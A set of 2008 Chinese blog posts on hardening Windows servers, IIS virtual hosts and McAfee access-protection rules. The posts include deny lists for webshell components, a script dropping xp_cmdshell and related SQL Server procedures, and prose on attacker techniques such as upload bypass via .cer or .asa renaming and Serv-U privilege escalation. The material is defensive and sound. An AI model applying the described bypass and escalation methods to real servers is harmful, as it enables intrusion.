通过咖啡杀软来防护浏览器主页被修改完全可以。这样不用在安装其他软件进行防护了。其他浏览器防护软件不但占用一定资源,而且效果不一定好。而咖啡防护效果相当理想。具体方法如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在本地创建/修改hosts文件
阻挡对象:IEXPLORE.EXE,或者*
要阻挡的文件或文件名:**\etc*\**
要阻止的文件操作:在创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
好了。恶意网站不能在更改您的主页了。 -
mcafee规则设置2
2008-05-07 03:12:10
6、阻止恶意脚本入侵。
打开咖啡杀软访问保护中文件保护规则,创建这样一些规则:
1、禁止在本地任何地方读取、执行、创建、写入任何js文件
2、禁止在本地任何地方读取、执行、创建、写入任何vbs文件
3、禁止在本地任何地方读取、执行、创建、写入任何htm文件
4、禁止在本地任何地方读取、执行、创建、写入任何html文件
好了,恶意网站通过脚本而入侵本机的恶意代码、木马基本滚蛋了。
部分规则创建如下所示:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在本地任何地方读取、执行、创建、写入任何js文件
阻挡对象:*
要阻挡的文件或文件名:**\*.js
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
其他的类似规则,参照设置即可。
当然,这样有些严厉,可能防碍上网,可以将这些规则修改为阻止创建、写入即可。
7、用咖啡来防止插件入侵。
现在上网越来越不安全。恶意插件越来越多了。好了。我们用咖啡来对付他们。由于那些插件是绑架到Internet Explorer文件里的,好了,我们用咖啡把Internet Explorer文件保护起来。
规则创建如下所示:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在Internet Explorer文件夹中进行创建写入活动
阻挡对象:*
要阻挡的文件或文件名:**\Internet Explorer*\**
要阻止的文件操作:在创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
好了,那些插件不能进来了。
8、防止黑客破坏活动。
目前,黑客越来越多,也越来越喜欢入侵个人主机。黑客入侵个人主机不外乎两个原因:
1、炼手。学习怎么入侵别人。
2、种植后门。控制他人。
好了。废话少说。黑客入侵,很难阻挡。那对于入侵的黑客破坏行为如何进行阻挡呢?看咖啡的手段。我们用咖啡建立这样的规则:禁止远程行为对本地任何文件/文件夹进行任何操作。这样,黑客即便入侵了您的主机,他所能做的还有什么呢?
具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止远程行为对本地任何文件/文件夹进行任何操作
阻挡对象:System:Remote
要阻挡的文件或文件名:**\*\**
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
如果还不放心,可以将系统盘里每个根目录文件夹都创建一个规则。禁止黑客对他们进行任何操作。具体就不一一列举里。这样设置,除非黑客能破坏咖啡,或者黑客知道咖啡密码,更改咖啡设置,才能进行进一步破坏活动。如果黑客想破坏咖啡,决非易事。用过咖啡的人知道,咖啡不能被退出进程,只会持续工作。当然黑客可以通过卸载咖啡来破坏,问题是,黑客进行远程卸载,必定调用exe之类文件,而咖啡是不允许黑客远程对exe之类文件进行任何操作的。偶使用咖啡不久,曾被一个黑客入侵,那时还不懂得设置如此严厉的规则,只是打开咖啡默认的对exe、dll文件保护规则,那个黑客都没有干成什么。如果能建立这样严厉的规则,黑客所能做的事情将会非常非常少哦。
9、防止程序运行。
咖啡具有强大的阻止功能,几乎可以阻止任何一个程序运行。比如,tftp.exe这个程序,一般用户是用不上的。可以用咖啡来阻止他运行。注:咖啡默认规则里已经设置,就不列举了。这个功能非常有用。如果某天,不想运行某个程序,可以参照这个规则,将那个程序终止。或者,某天中了木马、病毒,又清除不掉,怎么办呢?这时咖啡这个功能就突显出来了。将那个木马、病毒程序用咖啡阻止起来即可。这样,那个木马不能运行也等于死悄悄了。
10、建立最严厉的规则。
在到黑客网站、破解基地、黄色网站去,往往难免中木马。虽然我不去那些网站,但为了那些常去黑客网站、破解基地、黄色网站的人的安全,特意为其创建如下规则。禁止在本地进行任何创建、写入、删除活动。这样,中招的几率将会是0。
具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在本地进行任何创建、写入、删除活动
阻挡对象:*
要阻挡的文件或文件名:**\*\**
要阻止的文件操作:在创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
由于这条规则非常严厉,建议只在黑客网站、破解基地、黄色网站浏览时开启。这条规则会产生大量日志,一分钟往往就有几百条详细日志,非常占用空间。所以,移动咖啡日志到其他盘非常重要。当然,这条规则,也适合那些对安全性非常高的人使用。
11、防止Cookies泄密个人隐私
某些网站或\和黑客,会利用Cookies窃取用户信息。好了。为了尽量杜绝此类事件,可以这样做。用咖啡建立Cookies保护机制。
具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止对Cookies文件进行某些操作
阻挡对象:*
要阻挡的文件或文件名:**\Cookies*\**
要阻止的文件操作:在读取文件、创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
好了。通过Cookies泄密的个人隐私得到咖啡的保护了。当然,这样设置在某些网站不合适宜。需要暂时取消这条规则。至于IE浏览器对Cookies的保护机制,不太好操作。用禁止,好多网站不能去。不禁止,又有危险。与咖啡相比,显然咖啡更加人性化。希望大家喜欢。
12、使用咖啡来防护个人隐私文件。
这是利用咖啡具有强大的文件保护性能来实现的。许多人喜欢使用某些加密软件对个人文件进行加密,起到防护作用。如果您使用咖啡,那完全可以利用咖啡来实现这个功能。而且防护效果非常理想。他人如果对咖啡不是非常熟悉,根本不会想到是一个杀软来保护的。而且,咖啡防护文件,在他人读取、打开文件时,根本不提密码,也不提咖啡,只是提示:请确认磁盘没有写保护之类。对于一般人来说,还以为文件损毁了而打不开哈。哈哈。是否有些意思?
下面简单介绍一下,如何实现这个功能。首先,请将您所有需要保护的个人文件都放在某个根目录里,比如,起名为,流星雨。然后将这个文件保护起来即可。
具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止对流星雨文件/文件夹进行任何操作
阻挡对象:*
要阻挡的文件或文件名:**\流星雨*\**
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
如果,您起其他文件名,参照设置即可。
好了,这样,在咖啡防护下,任何人都不能打开、删除这个文件了。只有当您暂时取消咖啡这条规则,才可以打开。
另外,别忘记需要先给咖啡设置8位数以上超强密码哦。在防护期间,将咖啡界面锁起来即可。
当然,个人来说,不会有什么绝对机密文件。无非是不想让他人看一些东东而已。所以,咖啡这个功能还是不错的哦。希望大家喜欢。
13、使用咖啡来安全的保护共享资源
这是完全可以的。
许多个人喜欢将自己的某些资源放在网络上与人共享,但是在共享同时,也必然存在不安全因素。为了最大限度保护个人安全,咖啡可以担当此重任。
咖啡具有强大的保护规则,完全可以做到这点。下面简单介绍一下,如何实现安全共享资源。现在假定硬盘是四个分区:C、D、E、F,系统盘是C盘。您想共享您的E盘资源。那么,您可以这样做。使用咖啡杀软建立这样几条规则:禁止远程行为对C盘进行任何操作;禁止远程行为对D盘进行任何操作;禁止远程行为在E盘进行创建/写入/删除操作;禁止远程行为对F盘进行任何操作。具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止远程行为对C盘进行任何操作
阻挡对象:System:Remote
要阻挡的文件或文件名:C:\*\**
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止远程行为对D盘进行任何操作
阻挡对象:System:Remote
要阻挡的文件或文件名:D:\*\**
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止远程行为在E盘进行创建/写入/删除操作
禁止远程行为对E盘进行任何操作
阻挡对象:System:Remote
要阻挡的文件或文件名:E:\*\**
要阻止的文件操作:在创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止远程行为对F盘进行任何操作
阻挡对象:System:Remote
要阻挡的文件或文件名:F:\*\**
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件、删除文件前打勾
响应方式:阻止并报告访问尝试
将上面规则进行设置之后,还需要用咖啡来保持现有共享资源。再打开咖啡控制台------访问保护------文件夹保护------共享资源,勾选保持共享资源的现有访问权限。再对咖啡设置15位数以上超强密码,并锁定咖啡界面。好了。利用咖啡来保护您的安全设置好了。如果您想共享U盘,也可以参照设置。
这些规则设置,也适合不少网站。不过需要稍微修改一下,才能更好的发挥作用。
14、限制计算机管理工具中重要管理工具的修改操作
计算机管理工具中有许多重要工具,比如,本地安全策略、分布式文件系统、服务、计算机管理、组策略等等。这些操作在修改完成之后,一般不会轻易更改。为防止他人更改这些设置,可以将他们禁用。禁用的方法很多。这里主要谈谈,通过咖啡杀软来如何实现这个功能。由于本地安全策略、分布式文件系统、服务、计算机管理、路由和远程访问、事件查看器、性能、远程桌面、证书颁发机构、终端服务配置、组件服务、组策略等等都通过调用mmc.exe来进行操作的,所以可以利用这个共同点,来实现对他们的禁用。规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:限制计算机管理工具中重要管理工具的修改操作
阻挡对象:*
要阻挡的文件或文件名:**\mmc.exe
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
通过这个设置,可以将Microsoft .NET Framework配置、本地安全策略、分布式文件系统、服务、计算机管理、路由和远程访问、事件查看器、性能、远程桌面、证书颁发机构、终端服务配置、组件服务、组策略、设备管理器、控制台等几十个重要工具,保护起来,拒绝他人进行修改操作。当咖啡这条规则启用时,对这些管理工具进行修改操作时,会被提示没有权限进行操作(即便您使用Administrators登陆,也一样没有权限进行修改)。若当您进行类似操作时,请打开咖啡,暂时取消这条规则即可。当然,给咖啡设置密码是必不可少的哦。
15、封锁QQ等聊天软件
封锁QQ是让网络管理员、公司老板(既要自己可以使用,又要不让他人使用QQ)头疼的工作,以往我们还可以通过封锁UDP的4000等端口来实现,不过自从TENCENT开辟了QQ的TCP/IP协议登录功能,封杀QQ变得更加困难。只要能上网,能够使用浏览器浏览网页就能上QQ。QQ使网络管理、公司老板变得更加烦琐。如果您使用咖啡企业版,那您可以用咖啡来彻底封杀QQ了。方法很简单,用咖啡来阻止QQ用行即可。具体规则设置如下:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止QQ运行
阻挡对象:*
要阻挡的文件或文件名:**\QQ.exe
要阻止的文件操作:在读取文件、执行文件、创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
上面规则设置好了,然后,再给咖啡设置10位以上超强密码,并锁定咖啡,好了,QQ在您的主机上不能被运行了。当他人想要运行QQ时,系统将提示:您没有权限运行QQ!除非咖啡解禁!如果您不想他人在您的主机上安装QQ,这个规则同样可以使用。此外,如果您想封杀其他聊天软件,参照封杀QQ的设置即可。这个规则,希望大家喜欢。个人家庭,尤其家长也适合的 。 -
虚拟主机安全配置--关键2
2008-05-07 00:32:33
1、禁止guests用户执行com.exe:我们可以通过以下命令取消guests执行com.exe的权限
cacls C:\WINNT\system3\Cmd.exe /e /d guests。
2、禁用Wscript.Shell组件:
Wscript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表,将此组件改名,来防止此类木马的危害。 HKEY_CLASSES_ROOT\Wscript.Shell\ 及HKEY_CLASSES_ROOT\Wscript.Shell.1\改名为其它的名字。将两项clsid的值也改一下 HKEY_CLASSES_ROOT\Wscript.Shell\CLSID\项目的值和HKEY_CLASSES_ROOT\ Wscript.Shell.1\CLSID\项目的值,也可以将其删除。
3、禁用Shell.Application组件
Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表,将此组件改名,来防止此类木马的危害。 HKEY_CLASSES_ROOT\Shell.Application\ 及HKEY_CLASSES_ROOT\Shell.Application.1\ 改名为其它的名字。将HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值 HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值更改或删除。同时,禁止Guest用户使用 shell32.dll来防止调用此组件。使用命令:cacls C:\WINNT\system32\shell32.dll /e /d guests
4、FileSystemObject组件
FileSystemObject可以对文件进行常规操作可以通过修改注册表,将此组件改名,来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT\ scripting.FileSystemObject\。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件,为了方便,这里不建议更改或删除。
5、禁止telnet登陆
在C:\WINNT\system32目录下有个login.cmd文件,将其用记事本打开,在文件末尾另取一行,加入exit保存。这样用户在登陆telnet时,便会立即自动退出。
注:以上修改注册表操作均需要重新启动WEB服务后才会生效。
六、端口设置
端口窗体底端就是门,这个比喻非常形象。如果我们服务器的所有端口都开放的话,那就意味着黑客有好多门可以进行入侵。所以我个人觉得,关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议(TCP/IP)属性,点击高级,进入高级TCP/IP设置,选择选项,在可选的设置中选择TCP/IP筛选,启用TCP/IP筛选。添加需要的端口,如21、80等,关闭其余的所有未使用的端口。
七、关闭文件共享
系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性,在常规选项种,取消Microsoft 网络文件和打印共享。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。
八、关闭非必要服务
类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ,利用服务器挂QQ,这种做法是极度错误的。
九、关注安全动态及时更新漏洞补丁
更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁,可以进一步保证系统的安全。
-
虚拟主机安全配置--关键1
2008-05-07 00:30:27
注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击,远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了方便还是不熟悉配置,干脆就将所有的网站都放在同一个目录中,然后将上级目录设置为站点根目录。有些呢,则将所有的站点的目录都设置为可执行、可写入、可修改。有些则为了方便,在服务器上挂起了QQ,也装上了BT。更有甚者,竟然把Internet来宾帐号加入到Administrators组中!汗……!普通的用户将自己的密码设置为生日之类的6位纯数字,这种情况还可以原谅,毕竟他们大部分都不是专门搞网络研究的,中国国民的安全意识提高还需要一段时间嘛,但如果是网络管理员也这样,那就怎么也有点让人想不通了。网络安全问题日益突出,最近不又有人声称“万网:我进来玩过两次了!”一句话,目前很大部分的网站安全状况让人担忧!这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例,跟大家共同探讨虚拟主机配置问题。
一、建立Windows用户
为每个网站单独设置windows用户帐号cert,删除帐号的User组,将cert加入Guest用户组。将用户不能更改密码,密码永不过期两个选项选上。
二、设置文件夹权限
1、设置非站点相关目录权限
Windows安装好后,很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改 的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。
C:\;D:\;……
C:\perl
C:\temp\
C:\Mysql\
c:\php\
C:\autorun.inf
C:\Documents and setting\
C:\Documents and Settings\All Users\「开始」菜单\程序\
C:\Documents and Settings\All Users\「开始」菜单\程序\启动
C:\Documents and Settings\All Users\Documents\
C:\Documents and Settings\All Users\Application Data\Symantec\
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
C:\WINNT\system32\config\
C:\winnt\system32\inetsrv\data\
C:\WINDOWS\system32\inetsrv\data\
C:\Program Files\
C:\Program Files\Serv-U\
c:\Program Files\KV2004\
c:\Program Files\Rising\RAV
C:\Program Files\RealServer\
C:\Program Files\Microsoft SQL server\
C:\Program Files\Java Web Start\以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系,这里仅简单提及。
2、设置站点相关目录权限:
A、设置站点根目录权限:将刚刚建立的用户cert给对应站点文件夹,假设为D:\cert设置相应的权限:Adiministrators组为完全控制;cert有读取及运行、列出文件夹目录、读取,取消其它所有权限。
B、设置可更新文件权限:经过第1步站点根目录文件夹权限的设置后,Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时,可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定,站点根目录中uploads为web可上传文件夹,data或者 database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。当然也可以像有些做的比较好的虚拟主机提供商一样,给客户做一个程序,让客户自己设定。可能要做到这样,服务商又得花不小的钱财和人力哦。
基本的配置应该大家都会,这里就提几个特殊之处或需要注意的地方。
1、主目录权限设置:这里可以设置读取就行了。写入、目录浏览等都可以不要,最关键的就是目录浏览了。除非特殊情况,否则应该关闭,不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。
2、应用程序配置:在站点属性中,主目录这一项中还有一个配置选项,点击进入。在应用程序映射选项中可以看到,默认有许多应用程序映射。将需要的保留,不需要的全部都删除。在入侵过程中,很多程序可能限制了asp,php等文件上传,但并不对cer,asa等文件进行限制,如果未将对应的应用程序映射删除,则可以将asp的后缀名改为cer或者asa后进行上传,木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射,可执行文件可以任意选择,后缀名为.mdb。这是为了防止后缀名为mdb的用户数据库被下载。
3、目录安全性设置:在站点属性中选择目录安全性,点击匿名访问和验证控制,选择允许匿名访问,点击编辑。如下图所示。删除默认用户,浏览选择对应于前面为cert网站设定的用户,并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览,可以有效阻止这类的跨目录跨站入侵。
4、可写目录执行权限设置:关闭所有可写目录的执行权限。由于程序方面的漏洞,目前非常流行上传一些网页木马,绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传,如果关闭了可写目录的执行权限,那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。
5、处理运行错误:这里有两种方法,一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息,选择发送文本错误信息给客户。二是定制错误页面。在IIS属性――自定义错误信息,在http错误信息中双击需要定制的错误页面,将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种,可以根据情况自行定制。这样一方面可以隐藏一些错误信息,另外一方面也可以使错误显示更加友好。
四、配置FTP
Ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。
1、管理员密码必须更改
如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码,这些工具使用起来就再好用不过了。如果更改了密码,那这些工具要想正常运行,那就没那么简单喽。得先破解管理员密码才行。
2、更改安装目录权限
Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中,则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限,那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后,得修改相应的文件夹权限,可以取消Guests用户的相应权限。
-
SideBySide (SxS) 错误 (事件ID: 32;事件ID: 59)
2008-05-06 02:28:43
Microsoft.VC80.MFCLOC 失败问题 SideBySide (SxS) 错误 (事件ID: 32;事件ID: 59)
在XP的事件查看器中找到以下错误:
事件ID: 32
找不到附属汇编 Microsoft.VC80.MFCLOC,上一个错误是参照的汇编没有安装在系统上。
事件ID: 59
Generate Activation Context 为 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.MFC_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_39049d00\MFC80U.DLL 失败。 参考错误消息: 操作成功完成。
事件ID: 59
Resolve Partial Assembly 为 Microsoft.VC80.MFCLOC 失败。参考错误消息: 参照的汇编没有安装在系统上。
上网查了一下,发现和 VC8.0 的运行库有关,下载了一个 vcredist_x86 安装包安装后问题解决。
下载地址是: http://www.microsoft.com/downloads/details.aspx?familyid=200B2FD9-AE1A-4A14-984D-389C36F85647&displaylang=zh-cn -
win2003的安全设置
2008-05-06 00:19:25
原理篇 我们将从入侵者入侵的各个环节来作出对应措施 一步步的加固windows系统. 加固windows系统.一共归于几个方面 1.端口限制 2.设置ACL权限 3.关闭服务或组件 4.包过滤 5.审计 我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统. 1.扫描 这是入侵者在刚开始要做的第一步.比如搜索有漏洞的服务. 对应措施:端口限制 以下所有规则.都需要选择镜像,否则会导致无法连接 我们需要作的就是打开服务所需要的端口.而将其他的端口一律屏蔽 2.下载信息 这里主要是通过URL SCAN.来过滤一些非法请求 对应措施:过滤相应包 我们通过安全URL SCAN并且设置urlscan.ini中的DenyExtensions字段 来阻止特定结尾的文件的执行 3.上传文件 入侵者通过这步上传WEBSHELL,提权软件,运行cmd指令等等. 对应措施:取消相应服务和功能,设置ACL权限 如果有条件可以不使用FSO的. 通过 regsvr32 /u c:\windows\system32\scrrun.dll来注销掉相关的DLL. 如果需要使用. 那就为每个站点建立一个user用户 对每个站点相应的目录.只给这个用户读,写,执行权限,给administrators全部权限 安装杀毒软件.实时杀除上传上来的恶意代码. 个人推荐MCAFEE或者卡巴斯基 如果使用MCAFEE.对WINDOWS目录所有添加与修改文件的行为进行阻止. 4.WebShell 入侵者上传文件后.需要利用WebShell来执行可执行程序.或者利用WebShell进行更加方便的文件操作. 对应措施:取消相应服务和功能 一般WebShell用到以下组件 WScript.Network WScript.Network.1 WScript.Shell WScript.Shell.1 Shell.Application Shell.Application.1 我们在注册表中将以上键值改名或删除 同时需要注意按照这些键值下的CLSID键的内容137096 c279 从/HKEY_CLASSES_ROOT/CLSID下面对应的键值删除 5.执行SHELL 入侵者获得shell来执行更多指令 对应措施:设置ACL权限 windows的命令行控制台位于\WINDOWS\SYSTEM32\CMD.EXE 我们将此文件的ACL修改为 某个特定管理员帐户(比如administrator)拥有全部权限. 其他用户.包括system用户,administrators组等等.一律无权限访问此文件. 6.利用已有用户或添加用户 入侵者通过利用修改已有用户或者添加windows正式用户.向获取管理员权限迈进 对应措施:设置ACL权限.修改用户 将除管理员外所有用户的终端访问权限去掉. 限制CMD.EXE的访问权限. 限制SQL SERVER内的XP_CMDSHELL 7.登陆图形终端 入侵者登陆TERMINAL SERVER或者RADMIN等等图形终端, 获取许多图形程序的运行权限.由于WINDOWS系统下绝大部分应用程序都是GUI的. 所以这步是每个入侵WINDOWS的入侵者都希望获得的 对应措施:端口限制 入侵者可能利用3389或者其他的木马之类的获取对于图形界面的访问. 我们在第一步的端口限制中.对所有从内到外的访问一律屏蔽也就是为了防止反弹木马. 所以在端口限制中.由本地访问外部网络的端口越少越好. 如果不是作为MAIL SERVER.可以不用加任何由内向外的端口. 阻断所有的反弹木马. 8.擦除脚印 入侵者在获得了一台机器的完全管理员权限后 就是擦除脚印来隐藏自身. 对应措施:审计 首先我们要确定在windows日志中打开足够的审计项目. 如果审计项目不足.入侵者甚至都无需去删除windows事件. 其次我们可以用自己的cmd.exe以及net.exe来替换系统自带的. 将运行的指令保存下来.了解入侵者的行动. 对于windows日志 我们可以通过将日志发送到远程日志服务器的方式来保证记录的完整性. evtsys工具([url=https://engineering.purdue.edu/ECN/Resources/Documents]https://engineering.purdue.edu/ECN/Resources/Documents[/url]) 提供将windows日志转换成syslog格式并且发送到远程服务器上的功能. 使用此用具.并且在远程服务器上开放syslogd,如果远程服务器是windows系统. 推荐使用kiwi syslog deamon. 我们要达到的目的就是 不让入侵者扫描到主机弱点 即使扫描到了也不能上传文件 即使上传文件了不能操作其他目录的文件 即使操作了其他目录的文件也不能执行shell 即使执行了shell也不能添加用户 即使添加用户了也不能登陆图形终端 即使登陆了图形终端.拥有系统控制权.他的所作所为还是会被记录下来. 额外措施: 我们可以通过增加一些设备和措施来进一步加强系统安全性. 1.代理型防火墙.如ISA2004 代理型防火墙可以对进出的包进行内容过滤. 设置对HTTP REQUEST内的request string或者form内容进行过滤 将SELECT.DROP.DELETE.INSERT等都过滤掉. 因为这些关键词在客户提交的表单或者内容中是不可能出现的. 过滤了以后可以说从根本杜绝了SQL 注入 2.用SNORT建立IDS 用另一台服务器建立个SNORT. 对于所有进出服务器的包都进行分析和记录 特别是FTP上传的指令以及HTTP对ASP文件的请求 可以特别关注一下. 本文提到的部分软件在提供下载的RAR中包含 包括COM命令行执行记录 URLSCAN 2.5以及配置好的配置文件 IPSEC导出的端口规则 evtsys 一些注册表加固的注册表项. 实践篇 下面我用的例子.将是一台标准的虚拟主机. 系统:windows2003 服务:[IIS] [SERV-U] [IMAIL] [SQL SERVER 2000] [PHP] [MYSQL] 描述:为了演示,绑定了最多的服务.大家可以根据实际情况做筛减 1.WINDOWS本地安全策略 端口限制 A.对于我们的例子来说.需要开通以下端口 外->本地 80 外->本地 20 外->本地 21 外->本地 PASV所用到的一些端口 外->本地 25 外->本地 110 外->本地 3389 然后按照具体情况.打开SQL SERVER和MYSQL的端口 外->本地 1433 外->本地 3306 B.接着是开放从内部往外需要开放的端口 按照实际情况,如果无需邮件服务,则不要打开以下两条规则 本地->外 53 TCP,UDP 本地->外 25 按照具体情况.如果无需在服务器上访问网页.尽量不要开以下端口 本地->外 80 C.除了明确允许的一律阻止.这个是安全规则的关键. 外->本地 所有协议 阻止 2.用户帐号 a.将administrator改名,例子中改为root b.取消所有除管理员root外所有用户属性中的 远程控制->启用远程控制 以及 终端服务配置文件->允许登陆到终端服务器 c.将guest改名为administrator并且修改密码 d.除了管理员root,IUSER以及IWAM以及ASPNET用户外.禁用其他一切用户.包括SQL DEBUG以及TERMINAL USER等等 3.目录权限 将所有盘符的权限,全部改为只有 administrators组 全部权限 system 全部权限 将C盘的所有子目录和子文件继承C盘的administrator(组或用户)和SYSTEM所有权限的两个权限 然后做如下修改 C:\Program Files\Common Files 开放Everyone 默认的读取及运行 列出文件目录 读取三个权限 C:\WINDOWS\ 开放Everyone 默认的读取及运行 列出文件目录 读取三个权限 C:\WINDOWS\Temp 开放Everyone 修改,读取及运行,列出文件目录,读取,写入权限 现在WebShell就无法在系统目录内写入文件了. 当然也可以使用更严格的权限. 在WINDOWS下分别目录设置权限. 可是比较复杂.效果也并不明显. 4.IIS 在IIS 6下.应用程序扩展内的文件类型对应ISAPI的类型已经去掉了IDQ,PRINT等等危险的脚本类型, 在IIS 5下我们需要把除了ASP以及ASA以外所有类型删除. 安装URLSCAN 在[DenyExtensions]中 一般加入以下内容 .cer .cdx .mdb .bat .cmd .com .htw .ida .idq .htr .idc .shtm .shtml .stm .printer 这样入侵者就无法下载.mdb数据库.这种方法比外面一些在文件头加入特殊字符的方法更加彻底. 因为即便文件头加入特殊字符.还是可以通过编码构造出来的 5.WEB目录权限 作为虚拟主机.会有许多独立客户 比较保险的做法就是为每个客户,建立一个windows用户 然后在IIS的响应的站点项内 把IIS执行的匿名用户.绑定成这个用户 并且把他指向的目录 权限变更为 administrators 全部权限 system 全部权限 单独建立的用户 读写执行 如果服务器上站点不多.并且有论坛 我们可以把每个论坛的上传目录 去掉此用户的执行权限. 只有读写权限 这样入侵者即便绕过论坛文件类型检测上传了webshell 也是无法运行的. 6.MS SQL SERVER2000 使用系统帐户登陆查询分析器 运行以下脚本 use master exec sp_dropextendedproc 'xp_cmdshell' exec sp_dropextendedproc 'xp_dirtree' exec sp_dropextendedproc 'xp_enumgroups' exec sp_dropextendedproc 'xp_fixeddrives' exec sp_dropextendedproc 'xp_loginconfig' exec sp_dropextendedproc 'xp_enumerrorlogs' exec sp_dropextendedproc 'xp_getfiledetails' exec sp_dropextendedproc 'Sp_OACreate' exec sp_dropextendedproc 'Sp_OADestroy' exec sp_dropextendedproc 'Sp_OAGetErrorInfo' exec sp_dropextendedproc 'Sp_OAGetProperty' exec sp_dropextendedproc 'Sp_OAMethod' exec sp_dropextendedproc 'Sp_OASetProperty' exec sp_dropextendedproc 'Sp_OAStop' exec sp_dropextendedproc 'Xp_regaddmultistring' exec sp_dropextendedproc 'Xp_regdeletekey' exec sp_dropextendedproc 'Xp_regdeletevalue' exec sp_dropextendedproc 'Xp_regenumvalues' exec sp_dropextendedproc 'Xp_regread' exec sp_dropextendedproc 'Xp_regremovemultistring' exec sp_dropextendedproc 'Xp_regwrite' drop procedure sp_makewebtask go 删除所有危险的扩展. sp_addextendedproc xp_fixeddrives,@dllname='xplog70.dll' execute sp_fulltext_database 'enable' 7.修改CMD.EXE以及NET.EXE权限 将两个文件的权限.修改到特定管理员才能访问,比如本例中.我们如下修改 cmd.exe root用户 所有权限 net.exe root用户 所有权现 这样就能防止非法访问. 还可以使用例子中提供的comlog程序 将com.exe改名_com.exe,然后替换com文件.这样可以记录所有执行的命令行指令 8.备份 使用ntbackup软件.备份系统状态. 使用reg.exe 备份系统关键数据 如reg export HKLM\SOFTWARE\ODBC e:\backup\system\odbc.reg /y 来备份系统的ODBC 9.杀毒 这里介绍MCAFEE 8i 中文企业版 因为这个版本对于国内的许多恶意代码和木马都能够及时的更新. 比如已经能够检测到海阳顶端2006 而且能够杀除IMAIL等SMTP软件使用的队列中MIME编码的病毒文件 而很多人喜欢安装诺顿企业版.而诺顿企业版,对于WEBSHELL.基本都是没有反应的. 而且无法对于MIME编码的文件进行杀毒. 在MCAFEE中. 我们还能够加入规则.阻止在windows目录建立和修改EXE.DLL文件等 我们在软件中加入对WEB目录的杀毒计划. 每天执行一次 并且打开实时监控. 10.关闭无用的服务 